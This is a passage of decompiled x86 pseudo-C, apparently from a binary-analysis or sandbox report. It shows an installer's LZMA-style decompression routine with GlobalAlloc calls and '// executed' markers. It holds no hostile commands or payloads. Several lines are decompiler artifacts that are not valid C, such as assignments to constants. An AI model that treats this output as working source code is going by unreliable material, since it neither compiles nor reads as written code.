                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t155 = __ebp - 0x70;
                                                                        											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        										}
                                                                        									}
                                                                        									L53:
                                                                        									_t172 = __ebp - 0x34;
                                                                        									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                        									L54:
                                                                        									__al =  *(__ebp - 0x44);
                                                                        									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                        									L55:
                                                                        									if( *(__ebp - 0x64) == 0) {
                                                                        										 *(__ebp - 0x88) = 0x1a;
                                                                        										goto L170;
                                                                        									}
                                                                        									__ecx =  *(__ebp - 0x68);
                                                                        									__al =  *(__ebp - 0x5c);
                                                                        									__edx =  *(__ebp - 8);
                                                                        									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        									 *( *(__ebp - 0x68)) = __al;
                                                                        									__ecx =  *(__ebp - 0x14);
                                                                        									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                        									__eax = __ecx + 1;
                                                                        									__edx = 0;
                                                                        									_t191 = __eax %  *(__ebp - 0x74);
                                                                        									__eax = __eax /  *(__ebp - 0x74);
                                                                        									__edx = _t191;
                                                                        									L79:
                                                                        									 *(__ebp - 0x14) = __edx;
                                                                        									L80:
                                                                        									 *(__ebp - 0x88) = 2;
                                                                        									goto L1;
                                                                        								}
                                                                        								if(__ebx >= 0x100) {
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L40;
                                                                        							} else {
                                                                        								L36:
                                                                        								if( *(__ebp - 0x6c) == 0) {
                                                                        									 *(__ebp - 0x88) = 0xd;
                                                                        									L170:
                                                                        									_t568 = 0x22;
                                                                        									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                        									_t535 = 0;
                                                                        									L172:
                                                                        									return _t535;
                                                                        								}
                                                                        								__ecx =  *(__ebp - 0x70);
                                                                        								__eax =  *(__ebp - 0xc);
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        								_t121 = __ebp - 0x70;
                                                                        								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        								goto L38;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L1:
                                                                        					_t534 =  *(_t614 - 0x88);
                                                                        					if(_t534 > 0x1c) {
                                                                        						L171:
                                                                        						_t535 = _t534 | 0xffffffff;
                                                                        						goto L172;
                                                                        					}
                                                                        					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                        						case 0:
                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                        							_t534 =  *( *(_t614 - 0x70));
                                                                        							if(_t534 > 0xe1) {
                                                                        								goto L171;
                                                                        							}
                                                                        							_t538 = _t534 & 0x000000ff;
                                                                        							_push(0x2d);
                                                                        							asm("cdq");
                                                                        							_pop(_t570);
                                                                        							_push(9);
                                                                        							_pop(_t571);
                                                                        							_t610 = _t538 / _t570;
                                                                        							_t540 = _t538 % _t570 & 0x000000ff;
                                                                        							asm("cdq");
                                                                        							_t605 = _t540 % _t571 & 0x000000ff;
                                                                        							 *(_t614 - 0x3c) = _t605;
                                                                        							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                        							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                        							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                        							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                        								L10:
                                                                        								if(_t613 == 0) {
                                                                        									L12:
                                                                        									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                        									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                        									goto L15;
                                                                        								} else {
                                                                        									goto L11;
                                                                        								}
                                                                        								do {
                                                                        									L11:
                                                                        									_t613 = _t613 - 1;
                                                                        									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                        								} while (_t613 != 0);
                                                                        								goto L12;
                                                                        							}
                                                                        							if( *(_t614 - 4) != 0) {
                                                                        								GlobalFree( *(_t614 - 4));
                                                                        							}
                                                                        							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                        							 *(_t614 - 4) = _t534;
                                                                        							if(_t534 == 0) {
                                                                        								goto L171;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                        								goto L10;
                                                                        							}
                                                                        						case 1:
                                                                        							L13:
                                                                        							__eflags =  *(_t614 - 0x6c);
                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                        								 *(_t614 - 0x88) = 1;
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                        							_t45 = _t614 - 0x48;
                                                                        							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                        							__eflags =  *_t45;
                                                                        							L15:
                                                                        							if( *(_t614 - 0x48) < 4) {
                                                                        								goto L13;
                                                                        							}
                                                                        							_t546 =  *(_t614 - 0x40);
                                                                        							if(_t546 ==  *(_t614 - 0x74)) {
                                                                        								L20:
                                                                        								 *(_t614 - 0x48) = 5;
                                                                        								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                        								goto L23;
                                                                        							}
                                                                        							 *(_t614 - 0x74) = _t546;
                                                                        							if( *(_t614 - 8) != 0) {
                                                                        								GlobalFree( *(_t614 - 8));
                                                                        							}
                                                                        							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                        							 *(_t614 - 8) = _t534;
                                                                        							if(_t534 == 0) {
                                                                        								goto L171;
                                                                        							} else {
                                                                        								goto L20;
                                                                        							}
                                                                        						case 2:
                                                                        							L24:
                                                                        							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                        							 *(_t614 - 0x84) = 6;
                                                                        							 *(_t614 - 0x4c) = _t553;
                                                                        							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                        							goto L132;
                                                                        						case 3:
                                                                        							L21:
                                                                        							__eflags =  *(_t614 - 0x6c);
                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                        								 *(_t614 - 0x88) = 3;
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                        							_t67 = _t614 - 0x70;
                                                                        							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                        							__eflags =  *_t67;
                                                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                        							L23:
                                                                        							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                        							if( *(_t614 - 0x48) != 0) {
                                                                        								goto L21;
                                                                        							}
                                                                        							goto L24;
                                                                        						case 4:
                                                                        							goto L133;
                                                                        						case 5:
                                                                        							goto L137;
                                                                        						case 6:
                                                                        							goto L0;
                                                                        						case 7:
                                                                        							__eflags =  *(__ebp - 0x40) - 1;
                                                                        							if( *(__ebp - 0x40) != 1) {
                                                                        								__eax =  *(__ebp - 0x24);
                                                                        								 *(__ebp - 0x80) = 0x16;
                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        								__eax =  *(__ebp - 0x28);
                                                                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        								__eax =  *(__ebp - 0x2c);
                                                                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        								__eax = 0;
                                                                        								__eflags =  *(__ebp - 0x38) - 7;
                                                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        								__al = __al & 0x000000fd;
                                                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                        								__eax =  *(__ebp - 4);
                                                                        								__eax =  *(__ebp - 4) + 0x664;
                                                                        								__eflags = __eax;
                                                                        								 *(__ebp - 0x58) = __eax;
                                                                        								goto L68;
                                                                        							}
                                                                        							__eax =  *(__ebp - 4);
                                                                        							__ecx =  *(__ebp - 0x38);
                                                                        							 *(__ebp - 0x84) = 8;
                                                                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                        							goto L132;
                                                                        						case 8:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__eax =  *(__ebp - 4);
                                                                        								__ecx =  *(__ebp - 0x38);
                                                                        								 *(__ebp - 0x84) = 0xa;
                                                                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                        							} else {
                                                                        								__eax =  *(__ebp - 0x38);
                                                                        								__ecx =  *(__ebp - 4);
                                                                        								__eax =  *(__ebp - 0x38) + 0xf;
                                                                        								 *(__ebp - 0x84) = 9;
                                                                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                        							}
                                                                        							goto L132;
                                                                        						case 9:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								goto L89;
                                                                        							}
                                                                        							__eflags =  *(__ebp - 0x60);
                                                                        							if( *(__ebp - 0x60) == 0) {
                                                                        								goto L171;
                                                                        							}
                                                                        							__eax = 0;
                                                                        							__eflags =  *(__ebp - 0x38) - 7;
                                                                        							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                        							__eflags = _t258;
                                                                        							0 | _t258 = _t258 + _t258 + 9;
                                                                        							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                        							goto L75;
                                                                        						case 0xa:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__eax =  *(__ebp - 4);
                                                                        								__ecx =  *(__ebp - 0x38);
                                                                        								 *(__ebp - 0x84) = 0xb;
                                                                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                        								goto L132;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x28);
                                                                        							goto L88;
                                                                        						case 0xb:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__ecx =  *(__ebp - 0x24);
                                                                        								__eax =  *(__ebp - 0x20);
                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        							} else {
                                                                        								__eax =  *(__ebp - 0x24);
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x28);
                                                                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        							L88:
                                                                        							__ecx =  *(__ebp - 0x2c);
                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                        							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        							L89:
                                                                        							__eax =  *(__ebp - 4);
                                                                        							 *(__ebp - 0x80) = 0x15;
                                                                        							__eax =  *(__ebp - 4) + 0xa68;
                                                                        							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                        							goto L68;
                                                                        						case 0xc:
                                                                        							L99:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0xc;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t334 = __ebp - 0x70;
                                                                        							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t334;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							__eax =  *(__ebp - 0x2c);
                                                                        							goto L101;
                                                                        						case 0xd:
                                                                        							goto L36;
                                                                        						case 0xe:
                                                                        							goto L45;
                                                                        						case 0xf:
                                                                        							goto L57;
                                                                        						case 0x10:
                                                                        							L109:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0x10;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t365 = __ebp - 0x70;
                                                                        							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t365;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							goto L111;
                                                                        						case 0x11:
                                                                        							L68:
                                                                        							__esi =  *(__ebp - 0x58);
                                                                        							 *(__ebp - 0x84) = 0x12;
                                                                        							goto L132;
                                                                        						case 0x12:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__eax =  *(__ebp - 0x58);
                                                                        								 *(__ebp - 0x84) = 0x13;
                                                                        								__esi =  *(__ebp - 0x58) + 2;
                                                                        								goto L132;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x4c);
                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                        							__ecx =  *(__ebp - 0x58);
                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                        							__eflags = __eax;
                                                                        							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                        							goto L130;
                                                                        						case 0x13:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								_t469 = __ebp - 0x58;
                                                                        								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                        								__eflags =  *_t469;
                                                                        								 *(__ebp - 0x30) = 0x10;
                                                                        								 *(__ebp - 0x40) = 8;
                                                                        								L144:
                                                                        								 *(__ebp - 0x7c) = 0x14;
                                                                        								goto L145;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x4c);
                                                                        							__ecx =  *(__ebp - 0x58);
                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                        							 *(__ebp - 0x30) = 8;
                                                                        							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                        							L130:
                                                                        							 *(__ebp - 0x58) = __eax;
                                                                        							 *(__ebp - 0x40) = 3;
                                                                        							goto L144;
                                                                        						case 0x14:
                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                        							__eax =  *(__ebp - 0x80);
                                                                        							goto L140;
                                                                        						case 0x15:
                                                                        							__eax = 0;
                                                                        							__eflags =  *(__ebp - 0x38) - 7;
                                                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        							__al = __al & 0x000000fd;
                                                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                        							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                        							goto L120;
                                                                        						case 0x16:
                                                                        							__eax =  *(__ebp - 0x30);
                                                                        							__eflags = __eax - 4;
                                                                        							if(__eax >= 4) {
                                                                        								_push(3);
                                                                        								_pop(__eax);
                                                                        							}
                                                                        							__ecx =  *(__ebp - 4);
                                                                        							 *(__ebp - 0x40) = 6;
                                                                        							__eax = __eax << 7;
                                                                        							 *(__ebp - 0x7c) = 0x19;
                                                                        							 *(__ebp - 0x58) = __eax;
                                                                        							goto L145;
                                                                        						case 0x17:
                                                                        							L145:
                                                                        							__eax =  *(__ebp - 0x40);
                                                                        							 *(__ebp - 0x50) = 1;
                                                                        							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                        							goto L149;
                                                                        						case 0x18:
                                                                        							L146:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0x18;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t484 = __ebp - 0x70;
                                                                        							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t484;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							L148:
                                                                        							_t487 = __ebp - 0x48;
                                                                        							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                        							__eflags =  *_t487;
                                                                        							L149:
                                                                        							__eflags =  *(__ebp - 0x48);
                                                                        							if( *(__ebp - 0x48) <= 0) {
                                                                        								__ecx =  *(__ebp - 0x40);
                                                                        								__ebx =  *(__ebp - 0x50);
                                                                        								0 = 1;
                                                                        								__eax = 1 << __cl;
                                                                        								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                        								__eax =  *(__ebp - 0x7c);
                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                        								goto L140;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x50);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        							__eax =  *(__ebp - 0x58);
                                                                        							__esi = __edx + __eax;
                                                                        							 *(__ebp - 0x54) = __esi;
                                                                        							__ax =  *__esi;
                                                                        							__edi = __ax & 0x0000ffff;
                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        								__cx = __ax;
                                                                        								__cx = __ax >> 5;
                                                                        								__eax = __eax - __ecx;
                                                                        								__edx = __edx + 1;
                                                                        								__eflags = __edx;
                                                                        								 *__esi = __ax;
                                                                        								 *(__ebp - 0x50) = __edx;
                                                                        							} else {
                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                        								0x800 = 0x800 - __edi;
                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        								goto L148;
                                                                        							} else {
                                                                        								goto L146;
                                                                        							}
                                                                        						case 0x19:
                                                                        							__eflags = __ebx - 4;
                                                                        							if(__ebx < 4) {
                                                                        								 *(__ebp - 0x2c) = __ebx;
                                                                        								L119:
                                                                        								_t393 = __ebp - 0x2c;
                                                                        								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                        								__eflags =  *_t393;
                                                                        								L120:
                                                                        								__eax =  *(__ebp - 0x2c);
                                                                        								__eflags = __eax;
                                                                        								if(__eax == 0) {
                                                                        									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                        									goto L170;
                                                                        								}
                                                                        								__eflags = __eax -  *(__ebp - 0x60);
                                                                        								if(__eax >  *(__ebp - 0x60)) {
                                                                        									goto L171;
                                                                        								}
                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                        								__eax =  *(__ebp - 0x30);
                                                                        								_t400 = __ebp - 0x60;
                                                                        								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                        								__eflags =  *_t400;
                                                                        								goto L123;
                                                                        							}
                                                                        							__ecx = __ebx;
                                                                        							__eax = __ebx;
                                                                        							__ecx = __ebx >> 1;
                                                                        							__eax = __ebx & 0x00000001;
                                                                        							__ecx = (__ebx >> 1) - 1;
                                                                        							__al = __al | 0x00000002;
                                                                        							__eax = (__ebx & 0x00000001) << __cl;
                                                                        							__eflags = __ebx - 0xe;
                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                        							if(__ebx >= 0xe) {
                                                                        								__ebx = 0;
                                                                        								 *(__ebp - 0x48) = __ecx;
                                                                        								L102:
                                                                        								__eflags =  *(__ebp - 0x48);
                                                                        								if( *(__ebp - 0x48) <= 0) {
                                                                        									__eax = __eax + __ebx;
                                                                        									 *(__ebp - 0x40) = 4;
                                                                        									 *(__ebp - 0x2c) = __eax;
                                                                        									__eax =  *(__ebp - 4);
                                                                        									__eax =  *(__ebp - 4) + 0x644;
                                                                        									__eflags = __eax;
                                                                        									L108:
                                                                        									__ebx = 0;
                                                                        									 *(__ebp - 0x58) = __eax;
                                                                        									 *(__ebp - 0x50) = 1;
                                                                        									 *(__ebp - 0x44) = 0;
                                                                        									 *(__ebp - 0x48) = 0;
                                                                        									L112:
                                                                        									__eax =  *(__ebp - 0x40);
                                                                        									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                        										_t391 = __ebp - 0x2c;
                                                                        										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                        										__eflags =  *_t391;
                                                                        										goto L119;
                                                                        									}
                                                                        									__eax =  *(__ebp - 0x50);
                                                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        									__eax =  *(__ebp - 0x58);
                                                                        									__esi = __edi + __eax;
                                                                        									 *(__ebp - 0x54) = __esi;
                                                                        									__ax =  *__esi;
                                                                        									__ecx = __ax & 0x0000ffff;
                                                                        									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                        									__eflags =  *(__ebp - 0xc) - __edx;
                                                                        									if( *(__ebp - 0xc) >= __edx) {
                                                                        										__ecx = 0;
                                                                        										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                        										__ecx = 1;
                                                                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                        										__ebx = 1;
                                                                        										__ecx =  *(__ebp - 0x48);
                                                                        										__ebx = 1 << __cl;
                                                                        										__ecx = 1 << __cl;
                                                                        										__ebx =  *(__ebp - 0x44);
                                                                        										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                        										__cx = __ax;
                                                                        										__cx = __ax >> 5;
                                                                        										__eax = __eax - __ecx;
                                                                        										__edi = __edi + 1;
                                                                        										__eflags = __edi;
                                                                        										 *(__ebp - 0x44) = __ebx;
                                                                        										 *__esi = __ax;
                                                                        										 *(__ebp - 0x50) = __edi;
                                                                        									} else {
                                                                        										 *(__ebp - 0x10) = __edx;
                                                                        										0x800 = 0x800 - __ecx;
                                                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                        										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        										 *__esi = __dx;
                                                                        									}
                                                                        									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        										L111:
                                                                        										_t368 = __ebp - 0x48;
                                                                        										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                        										__eflags =  *_t368;
                                                                        										goto L112;
                                                                        									} else {
                                                                        										goto L109;
                                                                        									}
                                                                        								}
                                                                        								__ecx =  *(__ebp - 0xc);
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                        								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                        								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                        									__ecx =  *(__ebp - 0x10);
                                                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        									__ebx = __ebx | 0x00000001;
                                                                        									__eflags = __ebx;
                                                                        									 *(__ebp - 0x44) = __ebx;
                                                                        								}
                                                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        									L101:
                                                                        									_t338 = __ebp - 0x48;
                                                                        									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                        									__eflags =  *_t338;
                                                                        									goto L102;
                                                                        								} else {
                                                                        									goto L99;
                                                                        								}
                                                                        							}
                                                                        							__edx =  *(__ebp - 4);
                                                                        							__eax = __eax - __ebx;
                                                                        							 *(__ebp - 0x40) = __ecx;
                                                                        							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                        							goto L108;
                                                                        						case 0x1a:
                                                                        							goto L55;
                                                                        						case 0x1b:
                                                                        							L75:
                                                                        							__eflags =  *(__ebp - 0x64);
                                                                        							if( *(__ebp - 0x64) == 0) {
                                                                        								 *(__ebp - 0x88) = 0x1b;
                                                                        								goto L170;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x14);
                                                                        							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        							__eflags = __eax -  *(__ebp - 0x74);
                                                                        							if(__eax >=  *(__ebp - 0x74)) {
                                                                        								__eax = __eax +  *(__ebp - 0x74);
                                                                        								__eflags = __eax;
                                                                        							}
                                                                        							__edx =  *(__ebp - 8);
                                                                        							__cl =  *(__eax + __edx);
                                                                        							__eax =  *(__ebp - 0x14);
                                                                        							 *(__ebp - 0x5c) = __cl;
                                                                        							 *(__eax + __edx) = __cl;
                                                                        							__eax = __eax + 1;
                                                                        							__edx = 0;
                                                                        							_t274 = __eax %  *(__ebp - 0x74);
                                                                        							__eax = __eax /  *(__ebp - 0x74);
                                                                        							__edx = _t274;
                                                                        							__eax =  *(__ebp - 0x68);
                                                                        							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        							_t283 = __ebp - 0x64;
                                                                        							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                        							__eflags =  *_t283;
                                                                        							 *( *(__ebp - 0x68)) = __cl;
                                                                        							goto L79;
                                                                        						case 0x1c:
                                                                        							while(1) {
                                                                        								L123:
                                                                        								__eflags =  *(__ebp - 0x64);
                                                                        								if( *(__ebp - 0x64) == 0) {
                                                                        									break;
                                                                        								}
                                                                        								__eax =  *(__ebp - 0x14);
                                                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        								__eflags = __eax -  *(__ebp - 0x74);
                                                                        								if(__eax >=  *(__ebp - 0x74)) {
                                                                        									__eax = __eax +  *(__ebp - 0x74);
                                                                        									__eflags = __eax;
                                                                        								}
                                                                        								__edx =  *(__ebp - 8);
                                                                        								__cl =  *(__eax + __edx);
                                                                        								__eax =  *(__ebp - 0x14);
                                                                        								 *(__ebp - 0x5c) = __cl;
                                                                        								 *(__eax + __edx) = __cl;
                                                                        								__eax = __eax + 1;
                                                                        								__edx = 0;
                                                                        								_t414 = __eax %  *(__ebp - 0x74);
                                                                        								__eax = __eax /  *(__ebp - 0x74);
                                                                        								__edx = _t414;
                                                                        								__eax =  *(__ebp - 0x68);
                                                                        								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
